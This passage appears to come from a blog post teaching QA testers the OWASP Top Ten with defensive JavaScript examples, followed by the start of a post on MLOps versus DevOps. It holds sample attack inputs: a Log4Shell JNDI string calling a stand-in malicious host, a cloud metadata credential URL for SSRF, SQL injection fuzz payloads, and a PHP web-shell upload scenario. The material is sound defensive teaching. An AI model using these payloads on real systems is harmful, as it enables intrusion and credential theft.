- Use Trusted Libraries: Avoid custom cryptographic implementations.
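Several of these points (strong algorithms, secure randomness, authenticated encryption, trusted libraries) meet in one small example. This sketch uses AES-256-GCM from Node’s built-in crypto module; the encrypt and decrypt helpers are hypothetical, and the random key stands in for one loaded from a vault.

```javascript
const crypto = require('node:crypto');

// Sketch: authenticated encryption with AES-256-GCM.
function encrypt(plaintext, key) {
  const iv = crypto.randomBytes(12); // 96-bit nonce from a CSPRNG; never reuse one with the same key
  const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);
  const ciphertext = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);
  return { iv, ciphertext, tag: cipher.getAuthTag() }; // the tag lets the reader detect tampering
}

function decrypt({ iv, ciphertext, tag }, key) {
  const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);
  decipher.setAuthTag(tag);
  // final() throws if the ciphertext, IV, or tag has been modified
  return Buffer.concat([decipher.update(ciphertext), decipher.final()]).toString('utf8');
}

const key = crypto.randomBytes(32); // 256-bit demo key; load real keys from a vault or KMS
const sealed = encrypt('card-token-1234', key);
console.log(decrypt(sealed, key)); // card-token-1234
```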

Injection

What is Injection?

Injection vulnerabilities arise when untrusted user input is directly included in commands or queries (e.g., SQL, OS commands) without proper validation or sanitization. This allows attackers to execute malicious code, steal data, or compromise the server.

Common Types

- SQL Injection: Manipulating database queries to access or modify data.

- Command Injection: Executing arbitrary system commands.

- NoSQL Injection: Exploiting NoSQL database queries.

- Cross-Site Scripting (XSS): Injecting malicious scripts into web pages.

- LDAP Injection: Altering LDAP queries to bypass authentication.

- Expression Language Injection: Manipulating server-side templates.

Common Causes

- Unvalidated Input: Failing to check user input from forms, URLs, or APIs.

- Dynamic Queries: Building queries with string concatenation instead of parameterization.

- Trusted Data Sources: Assuming data from cookies, headers, or URLs is safe.

- Lack of Sanitization: Not filtering dangerous characters (e.g., ', ", <, >).

Real‑World Exploit Example – Classic ‘1 = 1’ SQL Bypass

QA Testing Focus – Break It Before Hackers Do

- Fuzz every parameter with SQL meta‑characters (', ", ;, --, /*).

- Inspect API endpoints for parameterised queries.

- Ensure stored procedures or ORM layers are in place.
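The fuzzing step can start from a small generator that appends each meta-character to one parameter at a time. This is a minimal sketch. The payload list, base URL, and parameter names are illustrative assumptions, and a real campaign would typically use a dedicated tool such as sqlmap or Burp Suite.

```javascript
// Common SQL meta-characters plus one classic probe (illustrative, not exhaustive).
const SQL_PAYLOADS = ["'", '"', ";", "--", "/*", "' OR '1'='1"];

// Yield one test URL per (parameter, payload) pair; other params keep valid values.
function* sqlFuzzCases(baseUrl, params) {
  for (const name of Object.keys(params)) {
    for (const payload of SQL_PAYLOADS) {
      const url = new URL(baseUrl);
      for (const [key, value] of Object.entries(params)) {
        url.searchParams.set(key, key === name ? value + payload : value);
      }
      yield { param: name, payload, url: url.toString() };
    }
  }
}
```

Send each generated URL and flag any response with a 500 status or a database error message. Either one suggests the input reached a query without being parameterized.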

Prevention Strategies

- Use Parameterized Queries: Avoid string concatenation in SQL or command queries.

- Validate and Sanitize Input: Filter out dangerous characters and validate data types.

- Escape User Input: Apply context-specific escaping for HTML, JavaScript, or SQL.

- Use ORM Frameworks: Leverage Object-Relational Mapping tools to reduce injection risks.

- Implement Allow Lists: Restrict input to expected values.

- Limit Database Permissions: Use least-privilege accounts for database access.

- Enable WAF: Deploy a Web Application Firewall to detect and block injection attempts.
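The first prevention item is easiest to see side by side. This is a minimal sketch that uses the `{ text, values }` query object accepted by node-postgres's `client.query()`, and it assumes a hypothetical `users` table. The functions only build query objects, so they run without a database.

```javascript
// UNSAFE: user input becomes part of the SQL text itself.
function unsafeFindUser(username) {
  return `SELECT id, password_hash FROM users WHERE username = '${username}'`;
}

// SAFE: the SQL text is fixed; input travels separately as a bound value.
// With node-postgres, this object can be passed to client.query(...).
function safeFindUser(username) {
  return {
    text: "SELECT id, password_hash FROM users WHERE username = $1",
    values: [username],
  };
}

// Allow-list for identifiers, which placeholders cannot bind (e.g. ORDER BY).
const SORT_COLUMNS = new Set(["name", "created_at", "price"]);
function sortColumnOrDefault(input) {
  return SORT_COLUMNS.has(input) ? input : "name";
}
```

With the input `' OR '1'='1`, the unsafe version produces `WHERE username = '' OR '1'='1'`, which matches every row. The safe version sends the same string as data only.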

Insecure Design

What is Insecure Design?

Insecure design refers to flaws in the application’s architecture or requirements that cannot be fixed by coding alone. These vulnerabilities stem from inadequate security considerations during the design phase.

Common Causes

- Lack of Threat Modeling: Failing to identify potential attack vectors during design.

- Missing Security Requirements: Not defining security controls in specifications.

- Inadequate Input Validation: Designing systems that trust user input implicitly.

- Poor Access Control Models: Not planning for proper authorization mechanisms.

Real‑World Exploit Example – Trust‑All File Upload

- Scenario: A marketing CMS offers “Upload your brand assets.” It stores files to /uploads/ and renders them directly. An attacker uploads payload.php, then visits https://cms.example.com/uploads/payload.php, gaining a remote shell.

- Impact: Attackers deface landing pages, plant dropper malware, and steal S3 keys baked into environment variables.

- Lesson: Specify an allow‑list (PNG/JPG/PDF), store files outside the web root, scan uploads with ClamAV, and serve them via a CDN that disallows dynamic execution.
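The allow-list from the lesson can check content as well as file names. This is a minimal sketch that accepts PNG, JPG, and PDF only when the file's leading "magic bytes" match its extension. It is a cheap first filter, not a replacement for storing files outside the web root or scanning them.

```javascript
const path = require("path");

// Allow-listed extensions mapped to the signature bytes each format starts with.
const ALLOWED_UPLOADS = new Map([
  [".png", Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a])],
  [".jpg", Buffer.from([0xff, 0xd8, 0xff])],
  [".jpeg", Buffer.from([0xff, 0xd8, 0xff])],
  [".pdf", Buffer.from("%PDF-", "ascii")],
]);

// Accept a file only if its extension is allow-listed AND its first bytes
// match that format's signature (a renamed payload.php fails the second check).
function isAllowedUpload(fileName, content) {
  const signature = ALLOWED_UPLOADS.get(path.extname(fileName).toLowerCase());
  if (!signature) return false; // .php, .html, no extension, etc.
  return content.length >= signature.length &&
    content.subarray(0, signature.length).equals(signature);
}
```

Polyglot files, which carry a valid image header followed by script code, can still pass this check. The other lesson items (storing files outside the web root and serving them without execution) remain necessary.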

QA Testing Focus – Threat‑Model the Requirements

- Sit in design reviews and ask “What could go wrong?” for each feature.

- Build test cases for negative paths that exploit design assumptions.

Prevention Strategies

- Conduct Threat Modeling: Identify and prioritize risks during the design phase.

- Incorporate Security Requirements: Define controls for authentication, encryption, and access.

- Adopt Secure Design Patterns: Use frameworks with built-in security features.

- Perform Design Reviews: Validate security assumptions with peer reviews.

- Train Developers: Educate teams on secure design principles.

Security Misconfiguration

What is Security Misconfiguration?

Security misconfiguration occurs when systems, frameworks, or servers are improperly configured, exposing vulnerabilities like default credentials, exposed directories, or unnecessary features.

Common Causes

- Default Configurations: Using unchanged default settings or credentials.

- Exposed Debugging: Leaving debug modes enabled in production.

- Directory Listing: Allowing directory browsing on servers.

- Unpatched Systems: Failing to apply security updates.

- Misconfigured Permissions: Overly permissive file or cloud storage settings.

Real‑World Exploit Example – Exposed .git Directory

- Scenario: During a last‑minute hotfix, DevOps copy the repo to a test VM, forget to disable directory listing, and push it live. An attacker downloads /.git/, reconstructs the repo with git checkout, and finds .env containing production DB creds.

- Impact: Database wiped and ransom demand left in a single table; six‑hour outage costs $220 k in SLA penalties.

- Lesson: Automate hardening: block dot‑files, disable directory listing, scan infra with CIS benchmarks during CI/CD.
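The "block dot‑files" rule can also be enforced in application code before static files are served. This is a minimal sketch. The `.well-known` exception is an assumption, based on that directory being a standard public location (RFC 8615). In practice the same rule is often written in the nginx or Apache configuration instead.

```javascript
// Dot-prefixed paths that are legitimately public (RFC 8615 well-known URIs).
const DOT_PATH_EXCEPTIONS = new Set([".well-known"]);

// True if any path segment starts with "." (e.g. /.git/HEAD, /.env).
// Percent-escapes are decoded first so /%2egit/ is caught as well.
function isDotPath(urlPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(urlPath.split("?")[0]);
  } catch {
    return true; // malformed encoding: block rather than guess
  }
  return decoded
    .split(/[\\/]/)
    .some((segment) => segment.startsWith(".") && !DOT_PATH_EXCEPTIONS.has(segment));
}
```

In a request handler, answer with a 404 whenever `isDotPath(req.url)` is true. A 404 avoids confirming to a scanner that the file exists.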

QA Testing Focus – Scan, Harden, Repeat

- Run Nessus or Nmap for open ports and default services.

- Validate security headers (HSTS, CSP) in responses.

- Verify that debug mode and detailed stack traces are disabled outside development.
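The header check above can be automated against any response. This is a minimal sketch that checks the headers named in this section (HSTS, CSP, X-Frame-Options). Flagging `Server` and `X-Powered-By` values that contain digits is a heuristic assumption for spotting exposed version numbers.

```javascript
// Headers named in this section's checklist and prevention list.
const REQUIRED_HEADERS = ["strict-transport-security", "content-security-policy", "x-frame-options"];

// Headers that often reveal server or framework versions.
const LEAKY_HEADERS = ["server", "x-powered-by"];

// Audit a plain object of response headers; returns human-readable findings.
function auditHeaders(headers) {
  const lower = new Map(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), String(v)]));
  const findings = REQUIRED_HEADERS.filter((h) => !lower.has(h)).map((h) => `missing: ${h}`);
  for (const h of LEAKY_HEADERS) {
    // Heuristic: a digit usually means a version number is exposed.
    if (lower.has(h) && /\d/.test(lower.get(h))) findings.push(`version leak: ${h}=${lower.get(h)}`);
  }
  return findings;
}
```

With the built-in `fetch` in Node.js 18+, `auditHeaders(Object.fromEntries((await fetch(url)).headers))` returns the findings for a live page.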

Prevention Strategies

- Harden Configurations: Disable unnecessary features and use secure defaults.

- Apply Security Headers: Use HSTS, Content-Security-Policy (CSP), and X-Frame-Options.

- Disable Directory Browsing: Prevent access to file listings.

- Patch Regularly: Keep systems and components updated.

- Audit Configurations: Use tools like Nessus to scan for misconfigurations.

- Use CI/CD Security Checks: Integrate configuration scans into pipelines.

Vulnerable and Outdated Components

What are Vulnerable and Outdated Components?

This risk involves using outdated or unpatched libraries, frameworks, or third-party services that contain known vulnerabilities.

Common Causes

- Unknown Component Versions: Lack of inventory for dependencies.

- Outdated Software: Using unsupported versions of servers, OS, or libraries.

- Delayed Patching: Infrequent updates expose systems to known exploits.

- Unmaintained Components: Relying on unsupported libraries.

Real‑World Exploit Example – Log4Shell Fallout

- Scenario: An internal microservice still runs Log4j 2.14.1. Attackers send a chat message containing ${jndi:ldap://malicious.com/a}. When the service logs the message, Log4j performs the JNDI lookup, fetches remote bytecode, and executes it.

- Impact: Lateral movement compromises the Kubernetes cluster; crypto‑mining containers spawn across 100 nodes, burning $30 k in cloud credits in two days.

- Lesson: Enforce dependency scanning (OWASP Dependency‑Check, Snyk), maintain an SBOM, and patch within 24 hours of critical CVE release.

QA Testing Focus – Gatekeep the Supply Chain

- Integrate OWASP Dependency‑Check in CI.

- Block builds if high‑severity CVEs are detected.

- Retest core workflows after each library upgrade.
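OWASP Dependency-Check has its own report formats. As a stand-in that needs no extra install, here is a minimal sketch of the "block builds" rule using the JSON report from `npm audit --json`. It assumes npm 7 or later and reads the severity counts under `metadata.vulnerabilities`. Note that `npm audit --audit-level=high` already exits non-zero by itself; a custom gate like this is only worth it when you want your own policy or reporting.

```javascript
const { execFileSync } = require("child_process");

// Severities that should fail the build (a policy choice, adjust as needed).
const BLOCKING_LEVELS = ["high", "critical"];

// Decide pass/fail from a parsed `npm audit --json` report.
// Fails closed: an unreadable report blocks the build instead of passing it.
function auditGate(report) {
  const counts = report && report.metadata && report.metadata.vulnerabilities;
  if (!counts) return { pass: false, blocking: ["unreadable report"] };
  const blocking = BLOCKING_LEVELS.filter((level) => (counts[level] || 0) > 0);
  return { pass: blocking.length === 0, blocking };
}

// Run npm audit in `cwd` and parse its JSON output. npm audit exits non-zero
// when it finds vulnerabilities, so stdout is recovered from the thrown error.
function runNpmAudit(cwd) {
  try {
    return JSON.parse(execFileSync("npm", ["audit", "--json"], { cwd, encoding: "utf8" }));
  } catch (err) {
    if (typeof err.stdout === "string" && err.stdout.trim()) return JSON.parse(err.stdout);
    throw err;
  }
}
```

In a CI step, call `auditGate(runNpmAudit(process.cwd()))` and exit with code 1 when `pass` is false. On Windows, the executable name is typically `npm.cmd`.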

Prevention Strategies

- Maintain an Inventory: Track all components and their versions.

- Automate Scans: Use tools like OWASP Dependency Check or retire.js.

- Subscribe to Alerts: Monitor CVE and NVD databases for vulnerabilities.

- Remove Unused Components: Eliminate unnecessary libraries or services.

- Use Trusted Sources: Download components from official, signed repositories.

- Monitor Lifecycle: Replace unmaintained components with supported alternatives.

Identification and Authentication Failures

What are Identification and Authentication Failures?

These vulnerabilities occur when authentication or session management mechanisms are weak, allowing attackers to steal accounts, bypass authentication, or hijack sessions.

Common Causes

- Credential Stuffing: Allowing automated login attempts with stolen credentials.

- Weak Passwords: Permitting default or easily guessable passwords.

- No MFA: Lack of multi-factor authentication.

- Session ID Exposure: Including session IDs in URLs.

- Poor Session Management: Reusing session IDs or not invalidating sessions.

Real‑World Exploit Example – Session Token in URL

- Scenario: A legacy e‑commerce flow appends JSESSIONID to URLs so bookmarking still works. Search‑engine crawlers log the links; attackers scrape access.log and reuse valid sessions.

- Impact: 205 premium accounts hijacked, loyalty points redeemed for gift cards.

- Lesson: Store session IDs in secure, HTTP‑only cookies; disable URL rewriting; rotate tokens on login, privilege change, and logout.
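The lesson's three controls can be sketched together in Node.js:

- Cookie-only session IDs.
- HttpOnly and Secure flags.
- Rotation on login or privilege change.

This is a minimal sketch. The cookie name `sid`, the 30-minute lifetime, and the in-memory `Map` standing in for a session store are all hypothetical choices.

```javascript
const crypto = require("crypto");

// 32 random bytes from a CSPRNG, base64url-encoded (43 characters).
function newSessionId() {
  return crypto.randomBytes(32).toString("base64url");
}

// Set-Cookie value that keeps the ID out of URLs and away from page scripts.
function sessionCookie(sessionId, maxAgeSeconds = 1800) {
  return `sid=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax; Max-Age=${maxAgeSeconds}`;
}

// Rotate on login or privilege change: move the session data to a fresh ID
// and delete the old one so a leaked ID stops working immediately.
function rotateSession(store, oldId) {
  const data = store.get(oldId) || {};
  store.delete(oldId);
  const newId = newSessionId();
  store.set(newId, data);
  return newId;
}
```

On logout, delete the ID from the store and send the same cookie with `Max-Age=0` so the browser discards it.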

QA Testing Focus – Stress‑Test the Auth Layer

- Launch brute‑force scripts to ensure rate limiting and lockouts.

- Check that MFA is mandatory for admins.

- Verify session IDs rotate on privilege change and logout.

Prevention Strategies

- Enable MFA: Require multi-factor authentication for sensitive actions.

- Enforce Strong Passwords: Block weak passwords using deny lists.

- Limit Login Attempts: Add delays or rate limits to prevent brute-force attacks.

- Use Secure Session Management: Generate random session IDs and invalidate sessions after logout.

- Log Suspicious Activity: Monitor and alert on unusual login patterns.
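"Limit Login Attempts" can be sketched as a fixed-window counter of failed logins per key, such as a username or client IP. This is a minimal in-memory sketch. The defaults of 5 attempts per 15 minutes are illustrative, and a deployment with several app instances would need a shared store instead of a `Map`.

```javascript
// Fixed-window limiter for failed logins, keyed by username or IP.
class LoginLimiter {
  constructor({ maxAttempts = 5, windowMs = 15 * 60 * 1000, now = Date.now } = {}) {
    this.maxAttempts = maxAttempts;
    this.windowMs = windowMs;
    this.now = now; // injectable clock, handy for tests
    this.failures = new Map(); // key -> { count, windowStart }
  }

  // True if another attempt is allowed for this key right now.
  isAllowed(key) {
    const entry = this.failures.get(key);
    if (!entry) return true;
    if (this.now() - entry.windowStart >= this.windowMs) {
      this.failures.delete(key); // window expired: start fresh
      return true;
    }
    return entry.count < this.maxAttempts;
  }

  recordFailure(key) {
    const t = this.now();
    const entry = this.failures.get(key);
    if (!entry || t - entry.windowStart >= this.windowMs) {
      this.failures.set(key, { count: 1, windowStart: t });
    } else {
      entry.count += 1;
    }
  }

  recordSuccess(key) {
    this.failures.delete(key);
  }
}
```

The QA brute-force script from the list above should see logins rejected after the limit is reached, and accepted again once the window has passed.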

Software and Data Integrity Failures

What are Software and Data Integrity Failures?

These occur when applications trust unverified code, data, or updates, allowing attackers to inject malicious code via insecure CI/CD pipelines or dependencies.

Common Causes

- Untrusted Sources: Using unsigned updates or libraries.

- Insecure CI/CD Pipelines: Poor access controls or lack of segregation.

- Unvalidated Serialized Data: Accepting manipulated data from clients.

Real‑World Exploit Example – Poisoned NPM Dependency

- Scenario: A developer adds a new NPM package that secretly posts process.env to a pastebin during the build. No integrity hash or package signature is checked.

- Impact: Production JWT signing key leaks; attackers mint tokens and access customer PII.

- Lesson: Install dependencies with npm’s --ignore-scripts flag, mandate Sigstore signatures or Subresource Integrity (SRI) checks, and run static analysis on transitive dependencies.

QA Testing Focus – Validate Build Integrity

- Confirm SHA‑256/Sigstore verification of artifacts.

- Ensure pipeline credentials use least privilege and are rotated.

- Simulate rollback to known‑good releases.
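The SHA-256 check on artifacts can be sketched with Node.js's `crypto` module. This sketch uses the SRI-style `algorithm-base64digest` format that npm also records in lockfiles. It is a minimal sketch that assumes the pinned integrity string comes from a trusted source, such as the lockfile or a signed release manifest. Sigstore verification needs its own tooling and is not shown.

```javascript
const crypto = require("crypto");

// SRI-style integrity string, e.g. "sha256-<base64 digest>". npm lockfiles
// record the same format (usually with sha512).
function integrityOf(buffer, algorithm = "sha256") {
  return `${algorithm}-${crypto.createHash(algorithm).update(buffer).digest("base64")}`;
}

// Recompute the digest with the pinned algorithm and compare.
function verifyIntegrity(buffer, pinned) {
  const algorithm = pinned.slice(0, pinned.indexOf("-"));
  if (!["sha256", "sha384", "sha512"].includes(algorithm)) return false;
  return integrityOf(buffer, algorithm) === pinned;
}
```

In a pipeline, run `verifyIntegrity` on each downloaded artifact before it is deployed, and fail the job on a mismatch.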

Prevention Strategies

- Use Digital Signatures: Verify the integrity of updates and code.

- Vet Repositories: Source libraries from trusted, secure repositories.

- Secure CI/CD: Enforce access controls and audit logs.

- Scan Dependencies: Use tools like OWASP Dependency Check.

- Review Changes: Implement strict code and configuration reviews.

Security Logging and Monitoring Failures

What are Security Logging and Monitoring Failures?

These occur when applications fail to log, monitor, or respond to security events, delaying breach detection.

Common Causes

- No Logging: Failing to record critical events like logins or access failures.

- Incomplete Logs: Missing context like IPs or timestamps.

- Local-Only Logs: Storing logs without centralized, secure storage.

- No Alerts: Lack of notifications for suspicious activity.

Real‑World Exploit Example – Silent SQLi in Production

- Scenario: The booking API swallows DB errors and returns a generic “Oops.” Attackers iterate blind SQLi, dumping the schema over weeks without detection. Fraud only surfaces when the payment processor flags unusual card‑not‑present spikes.

- Impact: 140 k cards compromised; regulator imposes $1.2 M fine.

- Lesson: Log all auth, DB, and application errors with unique IDs; forward to a SIEM with anomaly detection; test alerting playbooks quarterly.

QA Testing Focus – Prove You Can Detect and Respond

- Trigger failed logins and verify entries hit the SIEM.

- Check logs include IP, timestamp, user ID, and action.

- Validate alerts escalate within agreed SLAs.

Prevention Strategies

- Log Critical Events: Capture logins, failures, and sensitive actions.

- Use Proper Formats: Emit structured logs that tools like the ELK Stack can parse.

- Sanitize Logs: Prevent log injection attacks.

- Enable Audit Trails: Use tamper-proof logs for sensitive actions.

- Implement Alerts: Set thresholds for incident escalation.

- Store Logs Securely: Retain logs for forensic analysis.
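Several of these items fit in one small helper: structured format, sanitized fields, and the IP, timestamp, user ID, and action fields from the QA checklist. This is a minimal sketch that emits one JSON line per security event. The field names are illustrative and should be aligned with your SIEM's schema.

```javascript
const crypto = require("crypto");

// Replace control characters (including CR and LF) so user-supplied values
// cannot forge extra lines in plain-text log sinks (log injection).
function sanitize(value) {
  return String(value).replace(/[\u0000-\u001f\u007f]/g, " ");
}

// Build one JSON line per security event with the fields the QA checks expect.
function securityEvent({ action, userId, ip, outcome, detail = "" }) {
  return JSON.stringify({
    timestamp: new Date().toISOString(),
    eventId: crypto.randomUUID(), // unique ID for cross-referencing errors
    action: sanitize(action),
    userId: sanitize(userId),
    ip: sanitize(ip),
    outcome: sanitize(outcome),
    detail: sanitize(detail),
  });
}
```

Writing the output with `console.log(securityEvent(...))` gives a log shipper one parseable record per line. A username containing a newline can no longer fake a second "successful login" entry.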

Server-Side Request Forgery (SSRF)

What is SSRF?

SSRF occurs when an application fetches a user-supplied URL without validation, allowing attackers to send unauthorized requests to internal systems.

Common Causes

- Unvalidated URLs: Accepting raw user input for server-side requests.

- Lack of Segmentation: Internal and external requests share the same network.

- HTTP Redirects: Allowing unverified redirects in fetches.

Real‑World Exploit Example – Metadata IP Hit

- Scenario: An image‑proxy microservice fetches URLs supplied by users. An attacker requests http://169.254.169.254/latest/meta-data/iam/security-credentials/. The service dutifully returns IAM temporary credentials.

- Impact: With the stolen keys, attackers snapshot production RDS instances and exfiltrate them to another region.

- Lesson: Add an allow‑list of outbound domains, block internal IP ranges at the network layer, and use SSRF‑mitigating libraries.

QA Testing Focus – Pen‑Test the Fetch Function

- Attempt requests to internal IP ranges and cloud metadata endpoints.

- Confirm only allow‑listed schemes (https) and domains are permitted.

- Validate outbound traffic rules at the firewall.

Prevention Strategies

- Validate URLs: Use allow lists for scheme, host, and port.

- Segment Networks: Isolate internal services from public access.

- Disable Redirects: Block HTTP redirects in server-side fetches.

- Monitor Firewalls: Log and analyse firewall activity.

- Avoid Metadata Exposure: Protect endpoints like 169.254.169.254.
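The URL validation rules can be sketched with the WHATWG `URL` parser built into Node.js. This is a minimal sketch. The two allowed hostnames are hypothetical, and the internal-range list covers common IPv4 ranges only; it is not exhaustive.

```javascript
const net = require("net");

// Hosts the image proxy may fetch from (hypothetical examples).
const ALLOWED_HOSTS = new Set(["images.example-cdn.com", "assets.partner.example"]);

// Loopback, private, and link-local IPv4 ranges, including the
// 169.254.169.254 metadata address. Not exhaustive (IPv6 is not covered).
function isInternalIPv4(ip) {
  if (!net.isIPv4(ip)) return false;
  const [a, b] = ip.split(".").map(Number);
  return a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168);
}

// Returns a URL object if the input may be fetched, otherwise null.
function checkOutboundUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return null; // not a parseable absolute URL
  }
  if (url.protocol !== "https:") return null; // scheme allow-list
  if (url.port !== "") return null; // only the default port 443
  if (url.username || url.password) return null; // no "user@host" tricks
  return ALLOWED_HOSTS.has(url.hostname) ? url : null;
}
```

An allowed name could still resolve to an internal address, so this check alone is not enough. Also resolve the hostname with `dns.promises.lookup` and reject it when `isInternalIPv4` returns true. Then fetch with `fetch(url, { redirect: "error" })` so a redirect cannot bounce the request inward. Network-layer blocking, as recommended above, remains the backstop.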

Conclusion

The OWASP Top Ten highlights the most critical web application security risks, from broken access control to SSRF. For QA professionals, understanding these vulnerabilities is essential to ensuring secure software. By incorporating robust testing strategies, such as automated scans, penetration testing, and configuration audits, QA teams can identify and mitigate these risks early in the development lifecycle. To excel in this domain, QA professionals should stay updated on evolving threats, leverage tools like Burp Suite, OWASP ZAP, and Nessus, and advocate for secure development practices. By mastering the OWASP Top Ten, you can position yourself as a valuable asset in delivering secure, high-quality web applications.

Frequently Asked Questions

Why should QA testers care about OWASP vulnerabilities?

QA testers play a vital role in identifying potential security flaws before an application reaches production. Familiarity with OWASP vulnerabilities helps testers validate secure development practices and reduce the risk of exploits.

How often is the OWASP Top 10 updated?

OWASP typically updates the Top 10 list every three to four years to reflect the changing threat landscape and the most common vulnerabilities observed in real-world applications.

Can QA testers help prevent OWASP vulnerabilities?

Yes. By incorporating security-focused test cases and collaborating with developers and security teams, QA testers can detect and prevent OWASP vulnerabilities during the testing phase.

Is knowledge of the OWASP Top 10 necessary for non-security QA roles?

Absolutely. While QA testers may not specialize in security, understanding the OWASP Top 10 enhances their ability to identify red flags, ask the right questions, and contribute to a more secure development lifecycle.

How can QA testers start learning about OWASP vulnerabilities?

QA testers can begin by studying the official OWASP website, reading documentation on each vulnerability, and applying this knowledge to create security-related test scenarios in their projects.

by Rajesh K | May 2, 2025 | Artificial Intelligence, Blog, Latest Post |

As engineering teams scale and AI adoption accelerates, MLOps and DevOps have emerged as foundational practices for delivering robust software and machine learning solutions efficiently. DevOps has long served as the cornerstone of streamlined software development and deployment, while MLOps is rapidly gaining momentum as organizations operationalize machine learning models at scale. Both aim to improve collaboration, automate workflows, and ensure reliability in production, but each addresses different challenges: DevOps focuses on application lifecycle management, whereas MLOps tackles the complexities of data, model training, and continuous ML integration. This blog explores the distinctions and synergies between the two, highlighting core principles, tooling ecosystems, and real-world use cases to help you understand how DevOps and MLOps can intersect to drive innovation in modern engineering environments.

What is DevOps?

DevOps, a portmanteau of “Development” and “Operations,” is a set of practices that bridges the gap between software development and IT operations. It emphasizes collaboration, automation, and continuous delivery to enable faster and more reliable software releases. DevOps emerged in the late 2000s as a response to the inefficiencies of siloed development and operations teams, where miscommunication often led to delays and errors.

Core Principles of DevOps

DevOps is often described through the CALMS framework:

- Culture: Foster collaboration and shared responsibility across teams.

- Automation: Automate repetitive tasks like testing, deployment, and monitoring.

- Lean: Minimize waste and optimize processes for efficiency.

- Measurement: Track performance metrics to drive continuous improvement.

- Sharing: Encourage knowledge sharing to break down silos.





DevOps Workflow

The DevOps lifecycle revolves around the CI/CD pipeline (Continuous Integration/Continuous Deployment):

1. Plan: Define requirements and plan features.

2. Code: Write and commit code to a version control system (e.g., Git).

3. Build: Compile code and create artefacts.

4. Test: Run automated tests to ensure code quality.

5. Deploy: Release code to production or staging environments.

6. Monitor: Track application performance and user feedback.

7. Operate: Maintain and scale infrastructure.

Example: DevOps in Action

Imagine a team developing a web application for an e-commerce platform. Developers commit code to a Git repository, triggering a CI/CD pipeline in Jenkins. The pipeline runs unit tests, builds a Docker container, and deploys it to a Kubernetes cluster on AWS. Monitoring tools like Prometheus and Grafana track performance, and any issues trigger alerts for the operations team. This streamlined process ensures rapid feature releases with minimal downtime.

What is MLOps?

MLOps, short for “Machine Learning Operations,” is a specialised framework that adapts DevOps principles to the unique challenges of machine learning workflows. ML models are not static pieces of code; they require data preprocessing, model training, validation, deployment, and continuous monitoring to maintain performance. MLOps aims to automate and standardize these processes to ensure scalable and reproducible ML systems.

Core Principles of MLOps

MLOps extends DevOps with ML-specific considerations:

- Data-Centric: Prioritise data quality, versioning, and governance.

- Model Lifecycle Management: Automate training, evaluation, and deployment.

- Continuous Monitoring: Track model performance and data drift.

- Collaboration: Align data scientists, ML engineers, and operations teams.

- Reproducibility: Ensure experiments can be replicated with consistent results.





MLOps Workflow

The MLOps lifecycle includes:

1. Data Preparation: Collect, clean, and version data.

2. Model Development: Experiment with algorithms and hyperparameters.

3. Training: Train models on large datasets, often using GPUs.

4. Validation: Evaluate model performance using metrics like accuracy or F1 score.

5. Deployment: Deploy models as APIs or embedded systems.

6. Monitoring: Track model predictions, data drift, and performance degradation.

7. Retraining: Update models with new data to maintain accuracy.
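The validation step's F1 score is the harmonic mean of precision and recall. This is a minimal sketch for binary labels (1 = positive class), written in JavaScript to match the other examples. In practice, teams would typically call a library function such as scikit-learn's `f1_score`.

```javascript
// Precision, recall, and F1 for binary labels where 1 is the positive class.
function binaryF1(yTrue, yPred) {
  if (yTrue.length !== yPred.length) throw new Error("length mismatch");
  let tp = 0, fp = 0, fn = 0;
  for (let i = 0; i < yTrue.length; i++) {
    if (yPred[i] === 1 && yTrue[i] === 1) tp++;
    else if (yPred[i] === 1 && yTrue[i] === 0) fp++;
    else if (yPred[i] === 0 && yTrue[i] === 1) fn++;
  }
  const precision = tp + fp === 0 ? 0 : tp / (tp + fp);
  const recall = tp + fn === 0 ? 0 : tp / (tp + fn);
  const f1 = precision + recall === 0 ? 0 : (2 * precision * recall) / (precision + recall);
  return { precision, recall, f1 };
}
```

For labels `[1, 0, 1, 1]` and predictions `[1, 0, 0, 1]`, precision is 1 and recall is 2/3, giving an F1 of 0.8. A pipeline might promote a retrained model only when its F1 on a held-out set meets an agreed threshold.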

Example: MLOps in Action

Consider a company building a recommendation system for a streaming service. Data scientists preprocess user interaction data and store it in a data lake. They use MLflow to track experiments, training a collaborative filtering model with TensorFlow. The model is containerized with Docker and deployed as a REST API using Kubernetes. A monitoring system detects a drop in recommendation accuracy due to changing user preferences (data drift), triggering an automated retraining pipeline. This ensures the model remains relevant and effective.

Comparing MLOps vs DevOps

While MLOps and DevOps share the goal of streamlining development and deployment, their focus areas, challenges, and tools differ significantly. Below is a detailed comparison across key dimensions.

| S. No | Aspect | DevOps | MLOps | Example |
|---|---|---|---|---|
| 1 | Scope and Objectives | Focuses on building, testing, and deploying software applications. Goal: reliable, scalable software with minimal latency. | Centres on developing, deploying, and maintaining ML models. Goal: accurate models that adapt to changing data. | DevOps: Output is a web application. MLOps: Output is a model needing ongoing validation. |
| 2 | Data Dependency | Software behaviour is deterministic and code-driven. Data is used mainly for testing. | ML models are data-driven. Data quality, volume, and drift heavily impact performance. | DevOps: Login feature tested with predefined inputs. MLOps: Fraud detection model trained on real-world data and monitored for anomalies. |
| 3 | Lifecycle Complexity | Linear lifecycle: code → build → test → deploy → monitor. Changes are predictable. | Iterative lifecycle with feedback loops for retraining and revalidation. Models degrade over time due to data drift. | DevOps: UI updated with new features. MLOps: Demand forecasting model retrained as sales patterns change. |
| 4 | Testing and Validation | Tests for functional correctness (unit, integration) and performance (load). | Tests include model evaluation (precision, recall), data validation (bias, missing values), and robustness. | DevOps: Tests ensure payment processing works. MLOps: Tests ensure the credit model avoids discrimination. |
| 5 | Monitoring | Monitors uptime, latency, and error rates. | Monitors model accuracy, data drift, fairness, and prediction latency. | DevOps: Alerts for server downtime. MLOps: Alerts for an accuracy drop due to new user demographics. |
